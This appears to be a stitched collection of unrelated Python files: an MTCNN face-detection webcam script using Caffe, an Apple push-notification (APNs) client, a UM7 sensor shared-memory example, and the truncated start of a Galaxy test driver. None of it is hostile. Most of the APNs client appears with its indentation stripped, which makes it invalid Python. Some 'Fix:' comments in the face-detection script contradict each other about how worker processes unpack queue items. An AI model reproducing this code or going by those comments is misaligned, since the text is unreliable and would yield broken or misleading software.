    :param img: (H, W, 3) image with B/R channels already swapped, values
        in [0, 255].
    :param minsize: minimum face size in pixels to search for.
    :param PNet: proposal network (caffe.Net).
    :param RNet: refinement network (caffe.Net).
    :param ONet: output network (caffe.Net), also predicts landmarks.
    :param threshold: three per-stage score thresholds.
    :param fastresize: normalize before resizing (saves one pass per scale).
    :param factor: pyramid scale factor between consecutive levels.
    :returns: (total_boxes, points) — (N, 5) boxes with scores, and the
        (N, 10) landmark coordinates (empty list when no third stage ran).
    """
    factor_count = 0
    # Fix: np.float was removed in NumPy 1.24; the builtin float is the
    # exact equivalent of the old alias.
    total_boxes = np.zeros((0, 9), float)
    points = []
    h = img.shape[0]
    w = img.shape[1]
    minl = min(h, w)
    img = img.astype(float)
    m = 12.0 / minsize
    minl = minl * m
    # create the scale pyramid
    scales = []
    while minl >= 12:
        scales.append(m * pow(factor, factor_count))
        minl *= factor
        factor_count += 1
    # Fix: a hard-coded debug list of scales overrode the computed pyramid
    # here, silently making the minsize/factor arguments ineffective;
    # removed so the pyramid above is actually used.
    # first stage: proposal network over every pyramid level
    tic()
    for scale in scales:
        hs = int(np.ceil(h * scale))
        ws = int(np.ceil(w * scale))
        if fastresize:
            im_data = (img - 127.5) * 0.0078125  # [0,255] -> [-1,1]
            im_data = cv2.resize(im_data, (ws, hs))  # default is bilinear
        else:
            im_data = cv2.resize(img, (ws, hs))  # default is bilinear
            im_data = (im_data - 127.5) * 0.0078125  # [0,255] -> [-1,1]
        im_data = np.swapaxes(im_data, 0, 2)
        im_data = np.array([im_data], dtype=float)
        PNet.blobs['data'].reshape(1, 3, ws, hs)
        PNet.blobs['data'].data[...] = im_data
        out = PNet.forward()
        boxes = generateBoundingBox(out['prob1'][0, 1, :, :], out['conv4-2'][0], scale, threshold[0])
        if boxes.shape[0] != 0:
            pick = nms(boxes, 0.5, 'Union')
            if len(pick) > 0:
                boxes = boxes[pick, :]
        if boxes.shape[0] != 0:
            total_boxes = np.concatenate((total_boxes, boxes), axis=0)
    print("Pnet boxes:", total_boxes.shape[0])
    print("Pnet time:")
    toc()
    tic()
    numbox = total_boxes.shape[0]
    if numbox > 0:
        # cross-scale nms, then refine using PNet's own regression output
        pick = nms(total_boxes, 0.7, 'Union')
        total_boxes = total_boxes[pick, :]
        regh = total_boxes[:, 3] - total_boxes[:, 1]
        regw = total_boxes[:, 2] - total_boxes[:, 0]
        t1 = total_boxes[:, 0] + total_boxes[:, 5] * regw
        t2 = total_boxes[:, 1] + total_boxes[:, 6] * regh
        t3 = total_boxes[:, 2] + total_boxes[:, 7] * regw
        t4 = total_boxes[:, 3] + total_boxes[:, 8] * regh
        t5 = total_boxes[:, 4]
        total_boxes = np.array([t1, t2, t3, t4, t5]).T
        total_boxes = rerec(total_boxes)  # convert boxes to squares
        total_boxes[:, 0:4] = np.fix(total_boxes[:, 0:4])
        [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
    numbox = total_boxes.shape[0]
    if numbox > 0:
        # second stage: crop/pad each candidate and resize to 24x24 for RNet
        tempimg = np.zeros((numbox, 24, 24, 3))
        for k in range(numbox):
            tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
            tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
            tempimg[k, :, :, :] = cv2.resize(tmp, (24, 24))
        tempimg = (tempimg - 127.5) * 0.0078125  # [0,255] -> [-1,1]
        tempimg = np.swapaxes(tempimg, 1, 3)
        RNet.blobs['data'].reshape(numbox, 3, 24, 24)
        RNet.blobs['data'].data[...] = tempimg
        out = RNet.forward()
        score = out['prob1'][:, 1]
        pass_t = np.where(score > threshold[1])[0]
        score = np.array([score[pass_t]]).T
        total_boxes = np.concatenate((total_boxes[pass_t, 0:4], score), axis=1)
        mv = out['conv5-2'][pass_t, :].T
        if total_boxes.shape[0] > 0:
            pick = nms(total_boxes, 0.7, 'Union')
            if len(pick) > 0:
                total_boxes = total_boxes[pick, :]
                total_boxes = bbreg(total_boxes, mv[:, pick])
                total_boxes = rerec(total_boxes)
    print("Rnet time:")
    toc()
    tic()
    numbox = total_boxes.shape[0]
    if numbox > 0:
        # third stage: 48x48 crops for ONet, which also outputs landmarks
        total_boxes = np.fix(total_boxes)
        [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
        tempimg = np.zeros((numbox, 48, 48, 3))
        for k in range(numbox):
            tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
            tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
            tempimg[k, :, :, :] = cv2.resize(tmp, (48, 48))
        tempimg = (tempimg - 127.5) * 0.0078125  # [0,255] -> [-1,1]
        tempimg = np.swapaxes(tempimg, 1, 3)
        ONet.blobs['data'].reshape(numbox, 3, 48, 48)
        ONet.blobs['data'].data[...] = tempimg
        out = ONet.forward()
        score = out['prob1'][:, 1]
        points = out['conv6-3']
        pass_t = np.where(score > threshold[2])[0]
        points = points[pass_t, :]
        score = np.array([score[pass_t]]).T
        total_boxes = np.concatenate((total_boxes[pass_t, 0:4], score), axis=1)
        mv = out['conv6-2'][pass_t, :].T
        w = total_boxes[:, 3] - total_boxes[:, 1] + 1
        h = total_boxes[:, 2] - total_boxes[:, 0] + 1
        # map normalized landmark coordinates back to image coordinates
        points[:, 0:5] = np.tile(w, (5, 1)).T * points[:, 0:5] + np.tile(total_boxes[:, 0], (5, 1)).T - 1
        points[:, 5:10] = np.tile(h, (5, 1)).T * points[:, 5:10] + np.tile(total_boxes[:, 1], (5, 1)).T - 1
        if total_boxes.shape[0] > 0:
            total_boxes = bbreg(total_boxes, mv[:, :])
            pick = nms(total_boxes, 0.7, 'Min')
            if len(pick) > 0:
                total_boxes = total_boxes[pick, :]
                points = points[pick, :]
    print("Onet time:")
    toc()
    return total_boxes, points
def initFaceDetector():
    """Load the three MTCNN caffe networks in CPU mode and return the
    parameter tuple consumed by haveFace():
    (minsize, PNet, RNet, ONet, threshold, factor).
    """
    minsize = 20  # minimum detectable face size, pixels
    # NOTE(review): hard-coded absolute model path — verify deployment layout.
    caffe_model_path = "/home/duino/iactive/mtcnn/model"
    threshold = [0.6, 0.7, 0.7]  # per-stage score thresholds
    factor = 0.709  # pyramid scale factor
    caffe.set_mode_cpu()
    PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
    RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
    ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
    return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
    """Run the MTCNN detector on one image.

    :param facedetector: tuple from initFaceDetector().
    :returns: (containFace, boundingboxes) — a bool and the detected boxes
        (empty list when the image is smaller than minsize).
    """
    minsize, PNet, RNet, ONet, threshold, factor = facedetector
    if max(img.shape[0], img.shape[1]) < minsize:
        return False, []
    # swap B and R channels: the detector expects matlab-style ordering
    img_matlab = img.copy()
    img_matlab[:, :, 0], img_matlab[:, :, 2] = img[:, :, 2].copy(), img[:, :, 0].copy()
    boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
    containFace = boundingboxes.shape[0] != 0
    return containFace, boundingboxes
def start_process(p_list):
    """Start every process in *p_list*."""
    for proc in p_list:
        proc.start()
def join_process(p_list):
    """Join (wait for) every process in *p_list*."""
    for proc in p_list:
        proc.join()
def detect_process(qin, qout):
    """Worker-process entry point: run MTCNN face detection on frames.

    Loads the caffe networks, signals readiness with an
    ('Initialized', None, None) message on ``qout``, then loops: reads
    (gray_frame, timestamp) items from ``qin`` and writes
    (boundingboxes, points, timestamp) results to ``qout``.  An item whose
    second field is 'Exit' terminates the loop.
    """
    minsize = 20
    caffe_model_path = "./model"
    threshold = [0.6, 0.7, 0.7]
    factor = 0.08
    caffe.set_mode_cpu()
    PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
    RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
    ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
    qout.put(('Initialized', None, None))  # signal main process that initialization has completed
    while True:
        # Fix: Queue.get() already blocks until an item is available; the
        # previous `if qin.empty(): continue` loop busy-waited, burning a
        # full CPU core per worker while idle.
        item = qin.get()
        # Fix: index instead of strict 2-tuple unpacking, so the exit
        # sentinel works even if main() sends extra tuple fields (the old
        # 3-tuple sentinel crashed the worker with ValueError).
        frame_gray, time_stamp = item[0], item[1]
        if time_stamp == 'Exit':  # When Exit is put into queue, the process should terminate
            break
        img = cv2.cvtColor(frame_gray, cv2.COLOR_GRAY2BGR)
        # swap B and R channels: the detector expects matlab-style ordering
        img_matlab = img.copy()
        tmp = img_matlab[:,:,2].copy()
        img_matlab[:,:,2] = img_matlab[:,:,0]
        img_matlab[:,:,0] = tmp
        boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
        qout.put((boundingboxes, points, time_stamp))
def main():
    """Capture webcam frames, farm them out to detector worker processes,
    and display the most recent detection results."""
    process_num = 3  # number of processes running the detection task
    cap = cv2.VideoCapture(0)
    cap.set(cv2.CAP_PROP_FRAME_WIDTH, 320)
    cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 240)
    boundingboxes = np.ndarray((0, 9))
    points = []
    input_queue = Queue(5)  # bounded so the camera cannot outrun the detectors
    output_queue = Queue()
    detect_p_list = []
    for i in range(process_num):
        detect_p_list.append(Process(target=detect_process, args=(input_queue, output_queue)))
        detect_p_list[i].daemon = True
    start_process(detect_p_list)
    # wait until every detection process reports initialization
    i = process_num
    while i != 0:
        if output_queue.get()[0] == 'Initialized':
            i -= 1
    last_time = timer()
    while True:
        print('--------------------------------------')
        # Capture frame-by-frame
        __, frame = cap.read()
        img_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        current_time = timer()
        input_queue.put((img_gray, current_time))
        if not output_queue.empty():
            _boundingboxes, _points, ts = output_queue.get()
            # keep only results newer than what is already displayed
            if ts - last_time > 0:
                print("Detection FPS = {0}".format(1.0/(ts-last_time)))
                boundingboxes = _boundingboxes
                points = _points
                last_time = ts
        print(boundingboxes)
        print(points)
        print(last_time)
        print("shape of boundingboxes:", boundingboxes.shape)
        print("input_queue size:", input_queue.qsize())
        print("output_queue size:", output_queue.qsize())
        img = drawBoxes(frame, boundingboxes)
        cv2.imshow('img', img)
        print("Display FPS = {0}".format(1.0/(timer()-current_time)))
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    # Terminate subprocesses: one sentinel per worker.
    # Fix: the sentinel must be a 2-tuple — detect_process unpacks
    # `frame_gray, time_stamp = qin.get()`, so the previous 3-tuple
    # (None, 'Exit', None) raised ValueError in the workers instead of
    # shutting them down.
    for i in range(process_num):
        input_queue.put((None, 'Exit'))
    join_process(detect_p_list)
    # When everything's done, release capture
    cap.release()
    cv2.destroyAllWindows()
# Script entry point: only run the capture/display loop when executed directly.
if __name__ == "__main__":
    main()
|
client.py | import collections
import json
import logging
import time
import typing
import weakref
from enum import Enum
from threading import Thread
from typing import Dict, Iterable, Optional, Tuple, Union
from .credentials import CertificateCredentials, Credentials
from .errors import ConnectionFailed, exception_class_for_reason
# We don't generally need to know about the Credentials subclasses except to
# keep the old API, where APNsClient took a cert_file
from .payload import Payload
class NotificationPriority(Enum):
    """Values for the ``apns-priority`` request header."""
    IMMEDIATE = '10'  # deliver immediately
    DELAYED = '5'  # deliver at a time that conserves the device's power
class NotificationType(Enum):
    """Values for the ``apns-push-type`` request header."""
    ALERT = 'alert'
    BACKGROUND = 'background'
    VOIP = 'voip'
    COMPLICATION = 'complication'
    FILEPROVIDER = 'fileprovider'
    MDM = 'mdm'
# One in-flight HTTP/2 request: its stream id and the device token it targets.
RequestStream = collections.namedtuple('RequestStream', ['stream_id', 'token'])
# A (device token, payload) pair used by send_notification_batch.
Notification = collections.namedtuple('Notification', ['token', 'payload'])
DEFAULT_APNS_PRIORITY = NotificationPriority.IMMEDIATE
# Hard upper bound on concurrent streams regardless of what the server advertises.
CONCURRENT_STREAMS_SAFETY_MAXIMUM = 1000
MAX_CONNECTION_RETRIES = 3
logger = logging.getLogger(__name__)
class APNsClient(object):
SANDBOX_SERVER = 'api.development.push.apple.com'
LIVE_SERVER = 'api.push.apple.com'
DEFAULT_PORT = 443
ALTERNATIVE_PORT = 2197
def __init__(self,
credentials: Union[Credentials, str],
use_sandbox: bool = False, use_alternative_port: bool = False, proto: Optional[str] = None,
json_encoder: Optional[type] = None, password: Optional[str] = None,
proxy_host: Optional[str] = None, proxy_port: Optional[int] = None,
heartbeat_period: Optional[float] = None) -> None:
if isinstance(credentials, str):
self.__credentials = CertificateCredentials(credentials, password) # type: Credentials
else:
self.__credentials = credentials
self._init_connection(use_sandbox, use_alternative_port, proto, proxy_host, proxy_port)
if heartbeat_period:
self._start_heartbeat(heartbeat_period)
self.__json_encoder = json_encoder
self.__max_concurrent_streams = 0
self.__previous_server_max_concurrent_streams = None
def _init_connection(self, use_sandbox: bool, use_alternative_port: bool, proto: Optional[str],
proxy_host: Optional[str], proxy_port: Optional[int]) -> None:
server = self.SANDBOX_SERVER if use_sandbox else self.LIVE_SERVER
port = self.ALTERNATIVE_PORT if use_alternative_port else self.DEFAULT_PORT
self._connection = self.__credentials.create_connection(server, port, proto, proxy_host, proxy_port)
def _start_heartbeat(self, heartbeat_period: float) -> None:
conn_ref = weakref.ref(self._connection)
def watchdog() -> None:
while True:
conn = conn_ref()
if conn is None:
break
conn.ping('-' * 8)
time.sleep(heartbeat_period)
thread = Thread(target=watchdog)
thread.setDaemon(True)
thread.start()
def send_notification(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> None:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
result = self.get_notification_result(stream_id)
if result != 'Success':
if isinstance(result, tuple):
reason, info = result
raise exception_class_for_reason(reason)(info)
else:
raise exception_class_for_reason(result)
def send_notification_async(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None,
push_type: Optional[NotificationType] = None) -> int:
json_str = json.dumps(notification.dict(), cls=self.__json_encoder, ensure_ascii=False, separators=(',', ':'))
json_payload = json_str.encode('utf-8')
headers = {}
inferred_push_type = None # type: Optional[str]
if topic is not None:
headers['apns-topic'] = topic
if topic.endswith('.voip'):
inferred_push_type = NotificationType.VOIP.value
elif topic.endswith('.complication'):
inferred_push_type = NotificationType.COMPLICATION.value
elif topic.endswith('.pushkit.fileprovider'):
inferred_push_type = NotificationType.FILEPROVIDER.value
elif any([
notification.alert is not None,
notification.badge is not None,
notification.sound is not None,
]):
inferred_push_type = NotificationType.ALERT.value
else:
inferred_push_type = NotificationType.BACKGROUND.value
if push_type:
inferred_push_type = push_type.value
if inferred_push_type:
headers['apns-push-type'] = inferred_push_type
if priority != DEFAULT_APNS_PRIORITY:
headers['apns-priority'] = priority.value
if expiration is not None:
headers['apns-expiration'] = '%d' % expiration
auth_header = self.__credentials.get_authorization_header(topic)
if auth_header is not None:
headers['authorization'] = auth_header
if collapse_id is not None:
headers['apns-collapse-id'] = collapse_id
url = '/3/device/{}'.format(token_hex)
stream_id = self._connection.request('POST', url, json_payload, headers) # type: int
return stream_id
def get_notification_result(self, stream_id: int) -> Union[str, Tuple[str, str]]:
"""
Get result for specified stream
The function returns: 'Success' or 'failure reason' or ('Unregistered', timestamp)
"""
with self._connection.get_response(stream_id) as response:
if response.status == 200:
return 'Success'
else:
raw_data = response.read().decode('utf-8')
data = json.loads(raw_data) # type: Dict[str, str]
if response.status == 410:
return data['reason'], data['timestamp']
else:
return data['reason']
def send_notification_batch(self, notifications: Iterable[Notification], topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None,
push_type: Optional[NotificationType] = None) -> Dict[str, Union[str, Tuple[str, str]]]:
"""
Send a notification to a list of tokens in batch. Instead of sending a synchronous request
for each token, send multiple requests concurrently. This is done on the same connection,
using HTTP/2 streams (one request per stream).
APNs allows many streams simultaneously, but the number of streams can vary depending on
server load. This method reads the SETTINGS frame sent by the server to figure out the
maximum number of concurrent streams. Typically, APNs reports a maximum of 500.
The function returns a dictionary mapping each token to its result. The result is "Success"
if the token was sent successfully, or the string returned by APNs in the 'reason' field of
the response, if the token generated an error.
"""
notification_iterator = iter(notifications)
next_notification = next(notification_iterator, None)
# Make sure we're connected to APNs, so that we receive and process the server's SETTINGS
# frame before starting to send notifications.
self.connect()
results = {}
open_streams = collections.deque() # type: typing.Deque[RequestStream]
# Loop on the tokens, sending as many requests as possible concurrently to APNs.
# When reaching the maximum concurrent streams limit, wait for a response before sending
# another request.
while len(open_streams) > 0 or next_notification is not None:
# Update the max_concurrent_streams on every iteration since a SETTINGS frame can be
# sent by the server at any time.
self.update_max_concurrent_streams()
if next_notification is not None and len(open_streams) < self.__max_concurrent_streams:
logger.info('Sending to token %s', next_notification.token)
stream_id = self.send_notification_async(next_notification.token, next_notification.payload, topic,
priority, expiration, collapse_id, push_type)
open_streams.append(RequestStream(stream_id, next_notification.token))
next_notification = next(notification_iterator, None)
if next_notification is None:
# No tokens remaining. Proceed to get results for pending requests.
logger.info('Finished sending all tokens, waiting for pending requests.')
else:
# We have at least one request waiting for response (otherwise we would have either
# sent new requests or exited the while loop.) Wait for the first outstanding stream
# to return a response.
pending_stream = open_streams.popleft()
result = self.get_notification_result(pending_stream.stream_id)
logger.info('Got response for %s: %s', pending_stream.token, result)
results[pending_stream.token] = result
return results
def update_max_concurrent_streams(self) -> None:
# Get the max_concurrent_streams setting returned by the server.
# The max_concurrent_streams value is saved in the H2Connection instance that must be
# accessed using a with statement in order to acquire a lock.
# pylint: disable=protected-access
with self._connection._conn as connection:
max_concurrent_streams = connection.remote_settings.max_concurrent_streams
if max_concurrent_streams == self.__previous_server_max_concurrent_streams:
# The server hasn't issued an updated SETTINGS frame.
return
self.__previous_server_max_concurrent_streams = max_concurrent_streams
# Handle and log unexpected values sent by APNs, just in case.
if max_concurrent_streams > CONCURRENT_STREAMS_SAFETY_MAXIMUM:
logger.warning('APNs max_concurrent_streams too high (%s), resorting to default maximum (%s)',
max_concurrent_streams, CONCURRENT_STREAMS_SAFETY_MAXIMUM)
self.__max_concurrent_streams = CONCURRENT_STREAMS_SAFETY_MAXIMUM
elif max_concurrent_streams < 1:
logger.warning('APNs reported max_concurrent_streams less than 1 (%s), using value of 1',
max_concurrent_streams)
self.__max_concurrent_streams = 1
else:
logger.info('APNs set max_concurrent_streams to %s', max_concurrent_streams)
self.__max_concurrent_streams = max_concurrent_streams
def connect(self) -> None:
    """
    Establish a connection to APNs. If already connected, the function does nothing. If the
    connection fails, the function retries up to MAX_CONNECTION_RETRIES times.
    """
    for attempt in range(1, MAX_CONNECTION_RETRIES + 1):
        # noinspection PyBroadException
        try:
            self._connection.connect()
            logger.info('Connected to APNs')
            return
        except Exception:  # pylint: disable=broad-except
            # close the connnection, otherwise next connect() call would do nothing
            self._connection.close()
            logger.exception('Failed connecting to APNs (attempt %s of %s)', attempt, MAX_CONNECTION_RETRIES)
    # All attempts exhausted without a successful connection.
    raise ConnectionFailed()
|
example_um7_latest_measurement_share_uart.py | #!/usr/bin/env python3
# Author: Dr. Konstantin Selyunin
# License: MIT
# Date: 28 March 2021
# NOTE: this only works with python3.8+ !
# Modified: 08 December 2021
import json
import logging
from pathlib import Path
import sys
from rsl_comm_py.um7_serial import UM7Serial
from rsl_comm_py.um7_broadcast_packets import UM7AllProcPacket, UM7AllRawPacket
from multiprocessing import shared_memory, Process, Lock
from time import sleep, time
# Fixed size of each shared-memory region; a serialized packet must fit within it.
BUFFER_SIZE = 1000
# Two shared-memory buffers: one for raw sensor packets, one for processed ones.
raw_data_shm = shared_memory.SharedMemory(create=True, size=BUFFER_SIZE)
proc_data_shm = shared_memory.SharedMemory(create=True, size=BUFFER_SIZE)
# Inter-process locks guarding access to the corresponding buffers.
raw_lock = Lock()
proc_lock = Lock()
def sensor_read_process(raw_shm: shared_memory.SharedMemory, proc_shm: shared_memory.SharedMemory, r_lock: Lock, p_lock: Lock):
    """Continuously read UM7 broadcast packets and publish them into shared memory.

    Each packet is JSON-serialized and written into the matching shared-memory
    buffer (raw or processed) while holding the corresponding lock. The buffer
    is space-padded first so stale bytes from a previous, longer packet cannot
    corrupt the JSON read by the consumer.
    """
    script_dir = Path(__file__).parent
    device_file = script_dir.parent.joinpath("rsl_A500CNP8.json")
    assert device_file.exists(), f"Device file with connection info: {device_file} does not exist!"
    um7 = UM7Serial(device=device_file)
    for packet in um7.recv_broadcast(flush_buffer_on_start=False):
        packet_bytes = bytes(json.dumps(packet.__dict__), encoding='utf-8')
        assert len(packet_bytes) <= BUFFER_SIZE, f"Packet cannot be serialized, increase `BUFFER` size at least up to {len(packet_bytes)}"
        if isinstance(packet, UM7AllRawPacket):
            # BUG FIX: use `with` so the lock is released even if the buffer
            # copy raises; the old acquire()/release() pair leaked the lock
            # on exception, deadlocking the consumer.
            with r_lock:
                raw_shm.buf[:] = b' ' * BUFFER_SIZE
                raw_shm.buf[:len(packet_bytes)] = packet_bytes
            # logging.warning(f"[SR][RAW] -> {packet}")
        elif isinstance(packet, UM7AllProcPacket):
            with p_lock:
                proc_shm.buf[:] = b' ' * BUFFER_SIZE
                proc_shm.buf[:len(packet_bytes)] = packet_bytes
            # logging.warning(f"[SR][PROC] -> {packet}")
def main_function():
    """Alternate between consuming raw and processed measurements for 60 seconds.

    Reads the JSON snapshot from the shared-memory buffers populated by
    sensor_read_process, reconstructs the packet object, and logs it.
    """
    start_time = time()
    idx = 0
    while time() - start_time < 60:
        idx += 1
        if idx % 2 == 0:
            # imagine I need to process raw data now
            with raw_lock:
                # BUG FIX: bytes() takes a real copy while the lock is held.
                # The original kept a live memoryview (shm.buf[:]) past the
                # lock release — a data race with the writer process, and the
                # exported view also makes SharedMemory.close() fail later.
                raw_meas_bytes = bytes(raw_data_shm.buf)
            raw_meas_str = str(raw_meas_bytes, encoding='utf-8')
            raw_meas_dict = json.loads(raw_meas_str)
            packet = UM7AllRawPacket(**raw_meas_dict)
            logging.warning(f"[MF][RAW ]: {packet}")
            sleep(3.0)  # move motors, do some hard work
        else:
            # here I need to handle proc data
            with proc_lock:
                proc_meas_bytes = bytes(proc_data_shm.buf)
            proc_meas_str = str(proc_meas_bytes, encoding='utf-8')
            proc_meas_dict = json.loads(proc_meas_str)
            packet = UM7AllProcPacket(**proc_meas_dict)
            logging.warning(f"[MF][PROC]: {packet}")
            sleep(2.0)  # move motors, do some hard work
if __name__ == '__main__':
    # Log both to a file named after this script and to stdout.
    logging.basicConfig(
        level=logging.WARNING,
        format='[%(asctime)s.%(msecs)03d]: %(message)s',
        datefmt='%H:%M:%S',
        handlers=[
            logging.FileHandler(f'{Path(__file__).stem}.log', mode='w'),
            logging.StreamHandler(sys.stdout),
        ])
    sensor_read_proc = Process(target=sensor_read_process, args=(raw_data_shm, proc_data_shm, raw_lock, proc_lock,))
    sensor_read_proc.start()
    sleep(1)  # give the reader a head start so the buffers hold valid JSON
    main_function()
    # BUG FIX: the reader loops forever; without stopping it here the
    # non-daemon child keeps the interpreter alive (the script never exits)
    # and keeps writing into memory we are about to unlink.
    sensor_read_proc.terminate()
    sensor_read_proc.join()
    proc_data_shm.close()
    proc_data_shm.unlink()
    raw_data_shm.close()
    raw_data_shm.unlink()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.app_unittest_utils.celery_helper import rebind_container_to_task
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import create_database, database_exists
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import get_admin_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
CAN_BUILD_ASGI_APP = sys.version_info[:2] >= (3, 7)
USE_UVICORN = asbool(os.environ.get('GALAXY_TEST_USE_UVICORN', CAN_BUILD_ASGI_APP))
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
    """Ensure TOOL_SHED_TEST_TMP_DIR points at a real directory and return it.

    Everything the tool-shed tests create (hgweb.config, databases, new
    repositories, ...) lives under this directory. Because the tool shed
    browses repository contents via HTTP, the full path must not contain
    characters that are invalid in URLs.
    """
    tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR')
    if tmp_dir is None:
        tmp_dir = os.path.realpath(tempfile.mkdtemp())
    os.environ['TOOL_SHED_TEST_TMP_DIR'] = tmp_dir
    return tmp_dir
def get_galaxy_test_tmp_dir():
    """Return the scratch directory for the test-managed Galaxy server.

    Honors GALAXY_TEST_TMP_DIR when set; otherwise creates a fresh tempdir.
    """
    configured = os.environ.get('GALAXY_TEST_TMP_DIR')
    return configured if configured is not None else tempfile.mkdtemp()
def configure_environment():
    """Hack up environment for test cases."""
    # no op remove if unused
    os.environ.setdefault('HTTP_ACCEPT_LANGUAGE', DEFAULT_LOCALES)
    # Used by get_filename in tool shed's twilltestcase.
    os.environ.setdefault("TOOL_SHED_TEST_FILE_DIR", TOOL_SHED_TEST_DATA)
    # Marker so downstream code knows the test environment was prepared.
    os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
    """Return the shared module-level logger for the test driver script."""
    return log
def ensure_test_file_dir_set():
    """Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.

    Return first directory for backward compat.
    """
    file_dirs = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
    os.environ['GALAXY_TEST_FILE_DIR'] = file_dirs
    first_dir, _, _ = file_dirs.partition(",")
    return first_dir
def setup_galaxy_config(
    tmpdir,
    use_test_file_dir=False,
    default_install_db_merged=True,
    default_tool_data_table_config_path=None,
    default_shed_tool_data_table_config=None,
    default_job_config_file=None,
    enable_tool_shed_check=False,
    default_tool_conf=None,
    shed_tool_conf=None,
    datatypes_conf=None,
